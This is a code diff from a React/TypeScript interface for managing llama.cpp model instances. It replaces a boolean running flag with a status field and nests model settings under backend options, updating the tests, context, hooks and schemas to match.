expect(mockOnSave).toHaveBeenCalledWith('my-instance', { expect(mockOnSave).toHaveBeenCalledWith('my-instance', {
auto_restart: true, // Default value auto_restart: true, // Default value
backend_type: BackendType.LLAMA_CPP
}) })
}) })
@@ -134,10 +136,10 @@ afterEach(() => {
describe('Edit Mode', () => { describe('Edit Mode', () => {
const mockInstance: Instance = { const mockInstance: Instance = {
name: 'existing-instance', name: 'existing-instance',
running: false, status: 'stopped',
options: { options: {
model: 'test-model.gguf', backend_type: BackendType.LLAMA_CPP,
gpu_layers: 10, backend_options: { model: 'test-model.gguf', gpu_layers: 10 },
auto_restart: false auto_restart: false
} }
} }
@@ -177,15 +179,15 @@ afterEach(() => {
await user.click(screen.getByTestId('dialog-save-button')) await user.click(screen.getByTestId('dialog-save-button'))
expect(mockOnSave).toHaveBeenCalledWith('existing-instance', { expect(mockOnSave).toHaveBeenCalledWith('existing-instance', {
model: 'test-model.gguf', backend_type: BackendType.LLAMA_CPP,
gpu_layers: 10, backend_options: { model: 'test-model.gguf', gpu_layers: 10 },
auto_restart: false auto_restart: false
}) })
}) })
it('shows correct button text for running vs stopped instances', () => { it('shows correct button text for running vs stopped instances', () => {
const runningInstance: Instance = { ...mockInstance, running: true } const runningInstance: Instance = { ...mockInstance, status: 'running' }
const { rerender } = render( const { rerender } = render(
<InstanceDialog <InstanceDialog
open={true} open={true}
@@ -271,6 +273,7 @@ afterEach(() => {
expect(mockOnSave).toHaveBeenCalledWith('test-instance', { expect(mockOnSave).toHaveBeenCalledWith('test-instance', {
auto_restart: true, auto_restart: true,
backend_type: BackendType.LLAMA_CPP,
max_restarts: 5, max_restarts: 5,
restart_delay: 10 restart_delay: 10
}) })
@@ -321,6 +324,7 @@ afterEach(() => {
// Should only include non-empty values // Should only include non-empty values
expect(mockOnSave).toHaveBeenCalledWith('clean-instance', { expect(mockOnSave).toHaveBeenCalledWith('clean-instance', {
auto_restart: true, // Only this default value should be included auto_restart: true, // Only this default value should be included
backend_type: BackendType.LLAMA_CPP
}) })
}) })
@@ -345,7 +349,8 @@ afterEach(() => {
expect(mockOnSave).toHaveBeenCalledWith('numeric-test', { expect(mockOnSave).toHaveBeenCalledWith('numeric-test', {
auto_restart: true, auto_restart: true,
gpu_layers: 15, // Should be number, not string backend_type: BackendType.LLAMA_CPP,
backend_options: { gpu_layers: 15 }, // Should be number, not string
}) })
}) })
}) })

View File

@@ -112,9 +112,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
try { try {
setError(null) setError(null)
await instancesApi.start(name) await instancesApi.start(name)
// Update only this instance's running status // Update only this instance's status
updateInstanceInMap(name, { running: true }) updateInstanceInMap(name, { status: "running" })
} catch (err) { } catch (err) {
setError(err instanceof Error ? err.message : 'Failed to start instance') setError(err instanceof Error ? err.message : 'Failed to start instance')
} }
@@ -124,9 +124,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
try { try {
setError(null) setError(null)
await instancesApi.stop(name) await instancesApi.stop(name)
// Update only this instance's running status // Update only this instance's status
updateInstanceInMap(name, { running: false }) updateInstanceInMap(name, { status: "stopped" })
} catch (err) { } catch (err) {
setError(err instanceof Error ? err.message : 'Failed to stop instance') setError(err instanceof Error ? err.message : 'Failed to stop instance')
} }
@@ -136,9 +136,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
try { try {
setError(null) setError(null)
await instancesApi.restart(name) await instancesApi.restart(name)
// Update only this instance's running status // Update only this instance's status
updateInstanceInMap(name, { running: true }) updateInstanceInMap(name, { status: "running" })
} catch (err) { } catch (err) {
setError(err instanceof Error ? err.message : 'Failed to restart instance') setError(err instanceof Error ? err.message : 'Failed to restart instance')
} }

View File

@@ -4,6 +4,7 @@ import type { ReactNode } from "react";
import { InstancesProvider, useInstances } from "@/contexts/InstancesContext"; import { InstancesProvider, useInstances } from "@/contexts/InstancesContext";
import { instancesApi } from "@/lib/api"; import { instancesApi } from "@/lib/api";
import type { Instance } from "@/types/instance"; import type { Instance } from "@/types/instance";
import { BackendType } from "@/types/instance";
import { AuthProvider } from "../AuthContext"; import { AuthProvider } from "../AuthContext";
// Mock the API module // Mock the API module
@@ -41,19 +42,19 @@ function TestComponent() {
<div data-testid="instances-count">{instances.length}</div> <div data-testid="instances-count">{instances.length}</div>
{instances.map((instance) => ( {instances.map((instance) => (
<div key={instance.name} data-testid={`instance-${instance.name}`}> <div key={instance.name} data-testid={`instance-${instance.name}`}>
{instance.name}:{instance.running.toString()} {instance.name}:{instance.status}
</div> </div>
))} ))}
{/* Action buttons for testing with specific instances */} {/* Action buttons for testing with specific instances */}
<button <button
onClick={() => createInstance("new-instance", { model: "test.gguf" })} onClick={() => createInstance("new-instance", { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "test.gguf" } })}
data-testid="create-instance" data-testid="create-instance"
> >
Create Instance Create Instance
</button> </button>
<button <button
onClick={() => updateInstance("instance1", { model: "updated.gguf" })} onClick={() => updateInstance("instance1", { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "updated.gguf" } })}
data-testid="update-instance" data-testid="update-instance"
> >
Update Instance Update Instance
@@ -99,8 +100,8 @@ function renderWithProvider(children: ReactNode) {
describe("InstancesContext", () => { describe("InstancesContext", () => {
const mockInstances: Instance[] = [ const mockInstances: Instance[] = [
{ name: "instance1", running: true, options: { model: "model1.gguf" } }, { name: "instance1", status: "running", options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "model1.gguf" } } },
{ name: "instance2", running: false, options: { model: "model2.gguf" } }, { name: "instance2", status: "stopped", options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "model2.gguf" } } },
]; ];
beforeEach(() => { beforeEach(() => {
@@ -132,10 +133,10 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("loading")).toHaveTextContent("false"); expect(screen.getByTestId("loading")).toHaveTextContent("false");
expect(screen.getByTestId("instances-count")).toHaveTextContent("2"); expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
expect(screen.getByTestId("instance-instance1")).toHaveTextContent( expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
"instance1:true" "instance1:running"
); );
expect(screen.getByTestId("instance-instance2")).toHaveTextContent( expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:false" "instance2:stopped"
); );
}); });
}); });
@@ -158,8 +159,8 @@ describe("InstancesContext", () => {
it("creates instance and adds it to state", async () => { it("creates instance and adds it to state", async () => {
const newInstance: Instance = { const newInstance: Instance = {
name: "new-instance", name: "new-instance",
running: false, status: "stopped",
options: { model: "test.gguf" }, options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "test.gguf" } },
}; };
vi.mocked(instancesApi.create).mockResolvedValue(newInstance); vi.mocked(instancesApi.create).mockResolvedValue(newInstance);
@@ -174,14 +175,15 @@ describe("InstancesContext", () => {
await waitFor(() => { await waitFor(() => {
expect(instancesApi.create).toHaveBeenCalledWith("new-instance", { expect(instancesApi.create).toHaveBeenCalledWith("new-instance", {
model: "test.gguf", backend_type: BackendType.LLAMA_CPP,
backend_options: { model: "test.gguf" }
}); });
}); });
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId("instances-count")).toHaveTextContent("3"); expect(screen.getByTestId("instances-count")).toHaveTextContent("3");
expect(screen.getByTestId("instance-new-instance")).toHaveTextContent( expect(screen.getByTestId("instance-new-instance")).toHaveTextContent(
"new-instance:false" "new-instance:stopped"
); );
}); });
}); });
@@ -214,8 +216,8 @@ describe("InstancesContext", () => {
it("updates instance and maintains it in state", async () => { it("updates instance and maintains it in state", async () => {
const updatedInstance: Instance = { const updatedInstance: Instance = {
name: "instance1", name: "instance1",
running: true, status: "running",
options: { model: "updated.gguf" }, options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "updated.gguf" } },
}; };
vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance); vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance);
@@ -230,7 +232,8 @@ describe("InstancesContext", () => {
await waitFor(() => { await waitFor(() => {
expect(instancesApi.update).toHaveBeenCalledWith("instance1", { expect(instancesApi.update).toHaveBeenCalledWith("instance1", {
model: "updated.gguf", backend_type: BackendType.LLAMA_CPP,
backend_options: { model: "updated.gguf" }
}); });
}); });
@@ -251,7 +254,7 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("loading")).toHaveTextContent("false"); expect(screen.getByTestId("loading")).toHaveTextContent("false");
// instance2 starts as not running // instance2 starts as not running
expect(screen.getByTestId("instance-instance2")).toHaveTextContent( expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:false" "instance2:stopped"
); );
}); });
@@ -262,7 +265,7 @@ describe("InstancesContext", () => {
expect(instancesApi.start).toHaveBeenCalledWith("instance2"); expect(instancesApi.start).toHaveBeenCalledWith("instance2");
// The running state should be updated to true // The running state should be updated to true
expect(screen.getByTestId("instance-instance2")).toHaveTextContent( expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:true" "instance2:running"
); );
}); });
}); });
@@ -276,7 +279,7 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("loading")).toHaveTextContent("false"); expect(screen.getByTestId("loading")).toHaveTextContent("false");
// instance1 starts as running // instance1 starts as running
expect(screen.getByTestId("instance-instance1")).toHaveTextContent( expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
"instance1:true" "instance1:running"
); );
}); });
@@ -287,7 +290,7 @@ describe("InstancesContext", () => {
expect(instancesApi.stop).toHaveBeenCalledWith("instance1"); expect(instancesApi.stop).toHaveBeenCalledWith("instance1");
// The running state should be updated to false // The running state should be updated to false
expect(screen.getByTestId("instance-instance1")).toHaveTextContent( expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
"instance1:false" "instance1:stopped"
); );
}); });
}); });
@@ -383,7 +386,7 @@ describe("InstancesContext", () => {
// Test that operations don't interfere with each other // Test that operations don't interfere with each other
const newInstance: Instance = { const newInstance: Instance = {
name: "new-instance", name: "new-instance",
running: false, status: "stopped",
options: {}, options: {},
}; };
vi.mocked(instancesApi.create).mockResolvedValue(newInstance); vi.mocked(instancesApi.create).mockResolvedValue(newInstance);
@@ -411,7 +414,7 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("instances-count")).toHaveTextContent("3"); // Still 3 expect(screen.getByTestId("instances-count")).toHaveTextContent("3"); // Still 3
// But the running state should change // But the running state should change
expect(screen.getByTestId("instance-instance2")).toHaveTextContent( expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:true" "instance2:running"
); );
}); });
}); });

View File

@@ -1,14 +1,19 @@
// ui/src/hooks/useInstanceHealth.ts // ui/src/hooks/useInstanceHealth.ts
import { useState, useEffect } from 'react' import { useState, useEffect } from 'react'
import type { HealthStatus } from '@/types/instance' import type { HealthStatus, InstanceStatus } from '@/types/instance'
import { healthService } from '@/lib/healthService' import { healthService } from '@/lib/healthService'
export function useInstanceHealth(instanceName: string, isRunning: boolean): HealthStatus | undefined { export function useInstanceHealth(instanceName: string, instanceStatus: InstanceStatus): HealthStatus | undefined {
const [health, setHealth] = useState<HealthStatus | undefined>() const [health, setHealth] = useState<HealthStatus | undefined>()
useEffect(() => { useEffect(() => {
if (!isRunning) { if (instanceStatus === "stopped") {
setHealth(undefined) setHealth({ status: "unknown", lastChecked: new Date() })
return
}
if (instanceStatus === "failed") {
setHealth({ status: instanceStatus, lastChecked: new Date() })
return return
} }
@@ -17,9 +22,9 @@ export function useInstanceHealth(instanceName: string, isRunning: boolean): Hea
setHealth(healthStatus) setHealth(healthStatus)
}) })
// Cleanup subscription on unmount or when running changes // Cleanup subscription on unmount or when instanceStatus changes
return unsubscribe return unsubscribe
}, [instanceName, isRunning]) }, [instanceName, instanceStatus])
return health return health
} }

View File

@@ -1,6 +1,6 @@
import { type CreateInstanceOptions, getAllFieldKeys } from '@/schemas/instanceOptions' import { type CreateInstanceOptions, type BackendOptions, getAllFieldKeys, getAllBackendFieldKeys } from '@/schemas/instanceOptions'
// Only define the basic fields we want to show by default // Instance-level basic fields (not backend-specific)
export const basicFieldsConfig: Record<string, { export const basicFieldsConfig: Record<string, {
label: string label: string
description?: string description?: string
@@ -30,6 +30,19 @@ export const basicFieldsConfig: Record<string, {
label: 'On-Demand Start', label: 'On-Demand Start',
description: 'Start instance upon receiving OpenAI-compatible API request' description: 'Start instance upon receiving OpenAI-compatible API request'
}, },
backend_type: {
label: 'Backend Type',
description: 'Type of backend to use for this instance'
}
}
// Backend-specific basic fields (these go in backend_options)
export const basicBackendFieldsConfig: Record<string, {
label: string
description?: string
placeholder?: string
required?: boolean
}> = {
model: { model: {
label: 'Model Path', label: 'Model Path',
placeholder: '/path/to/model.gguf', placeholder: '/path/to/model.gguf',
@@ -56,6 +69,10 @@ export function isBasicField(key: keyof CreateInstanceOptions): boolean {
return key in basicFieldsConfig return key in basicFieldsConfig
} }
export function isBasicBackendField(key: keyof BackendOptions): boolean {
return key in basicBackendFieldsConfig
}
export function getBasicFields(): (keyof CreateInstanceOptions)[] { export function getBasicFields(): (keyof CreateInstanceOptions)[] {
return Object.keys(basicFieldsConfig) as (keyof CreateInstanceOptions)[] return Object.keys(basicFieldsConfig) as (keyof CreateInstanceOptions)[]
} }
@@ -64,5 +81,13 @@ export function getAdvancedFields(): (keyof CreateInstanceOptions)[] {
return getAllFieldKeys().filter(key => !isBasicField(key)) return getAllFieldKeys().filter(key => !isBasicField(key))
} }
export function getBasicBackendFields(): (keyof BackendOptions)[] {
return Object.keys(basicBackendFieldsConfig) as (keyof BackendOptions)[]
}
export function getAdvancedBackendFields(): (keyof BackendOptions)[] {
return getAllBackendFieldKeys().filter(key => !isBasicBackendField(key))
}
// Re-export the Zod-based functions // Re-export the Zod-based functions
export { getFieldType } from '@/schemas/instanceOptions' export { getFieldType, getBackendFieldType } from '@/schemas/instanceOptions'

View File

@@ -1,14 +1,8 @@
import { BackendType } from '@/types/instance'
import { z } from 'zod' import { z } from 'zod'
// Define the Zod schema // Define the backend options schema (previously embedded in CreateInstanceOptionsSchema)
export const CreateInstanceOptionsSchema = z.object({ export const BackendOptionsSchema = z.object({
// Restart options
auto_restart: z.boolean().optional(),
max_restarts: z.number().optional(),
restart_delay: z.number().optional(),
idle_timeout: z.number().optional(),
on_demand_start: z.boolean().optional(),
// Common params // Common params
verbose_prompt: z.boolean().optional(), verbose_prompt: z.boolean().optional(),
threads: z.number().optional(), threads: z.number().optional(),
@@ -176,22 +170,57 @@ export const CreateInstanceOptionsSchema = z.object({
fim_qwen_14b_spec: z.boolean().optional(), fim_qwen_14b_spec: z.boolean().optional(),
}) })
// Infer the TypeScript type from the schema // Define the main create instance options schema
export const CreateInstanceOptionsSchema = z.object({
// Restart options
auto_restart: z.boolean().optional(),
max_restarts: z.number().optional(),
restart_delay: z.number().optional(),
idle_timeout: z.number().optional(),
on_demand_start: z.boolean().optional(),
// Backend configuration
backend_type: z.enum([BackendType.LLAMA_CPP]).optional(),
backend_options: BackendOptionsSchema.optional(),
})
// Infer the TypeScript types from the schemas
export type BackendOptions = z.infer<typeof BackendOptionsSchema>
export type CreateInstanceOptions = z.infer<typeof CreateInstanceOptionsSchema> export type CreateInstanceOptions = z.infer<typeof CreateInstanceOptionsSchema>
// Helper to get all field keys // Helper to get all field keys for CreateInstanceOptions
export function getAllFieldKeys(): (keyof CreateInstanceOptions)[] { export function getAllFieldKeys(): (keyof CreateInstanceOptions)[] {
return Object.keys(CreateInstanceOptionsSchema.shape) as (keyof CreateInstanceOptions)[] return Object.keys(CreateInstanceOptionsSchema.shape) as (keyof CreateInstanceOptions)[]
} }
// Helper to get all backend option field keys
export function getAllBackendFieldKeys(): (keyof BackendOptions)[] {
return Object.keys(BackendOptionsSchema.shape) as (keyof BackendOptions)[]
}
// Get field type from Zod schema // Get field type from Zod schema
export function getFieldType(key: keyof CreateInstanceOptions): 'text' | 'number' | 'boolean' | 'array' { export function getFieldType(key: keyof CreateInstanceOptions): 'text' | 'number' | 'boolean' | 'array' | 'object' {
const fieldSchema = CreateInstanceOptionsSchema.shape[key] const fieldSchema = CreateInstanceOptionsSchema.shape[key]
if (!fieldSchema) return 'text' if (!fieldSchema) return 'text'
// Handle ZodOptional wrapper // Handle ZodOptional wrapper
const innerSchema = fieldSchema instanceof z.ZodOptional ? fieldSchema.unwrap() : fieldSchema const innerSchema = fieldSchema instanceof z.ZodOptional ? fieldSchema.unwrap() : fieldSchema
if (innerSchema instanceof z.ZodBoolean) return 'boolean'
if (innerSchema instanceof z.ZodNumber) return 'number'
if (innerSchema instanceof z.ZodArray) return 'array'
if (innerSchema instanceof z.ZodObject) return 'object'
return 'text' // ZodString and others default to text
}
// Get field type for backend options
export function getBackendFieldType(key: keyof BackendOptions): 'text' | 'number' | 'boolean' | 'array' {
const fieldSchema = BackendOptionsSchema.shape[key]
if (!fieldSchema) return 'text'
// Handle ZodOptional wrapper
const innerSchema = fieldSchema instanceof z.ZodOptional ? fieldSchema.unwrap() : fieldSchema
if (innerSchema instanceof z.ZodBoolean) return 'boolean' if (innerSchema instanceof z.ZodBoolean) return 'boolean'
if (innerSchema instanceof z.ZodNumber) return 'number' if (innerSchema instanceof z.ZodNumber) return 'number'
if (innerSchema instanceof z.ZodArray) return 'array' if (innerSchema instanceof z.ZodArray) return 'array'

View File

@@ -2,14 +2,22 @@ import type { CreateInstanceOptions } from '@/schemas/instanceOptions'
export { type CreateInstanceOptions } from '@/schemas/instanceOptions' export { type CreateInstanceOptions } from '@/schemas/instanceOptions'
export const BackendType = {
LLAMA_CPP: 'llama_cpp'
} as const
export type BackendTypeValue = typeof BackendType[keyof typeof BackendType]
export type InstanceStatus = 'running' | 'stopped' | 'failed'
export interface HealthStatus { export interface HealthStatus {
status: 'ok' | 'loading' | 'error' | 'unknown' status: 'ok' | 'loading' | 'error' | 'unknown' | 'failed'
message?: string message?: string
lastChecked: Date lastChecked: Date
} }
export interface Instance { export interface Instance {
name: string; name: string;
running: boolean; status: InstanceStatus;
options?: CreateInstanceOptions; options?: CreateInstanceOptions;
} }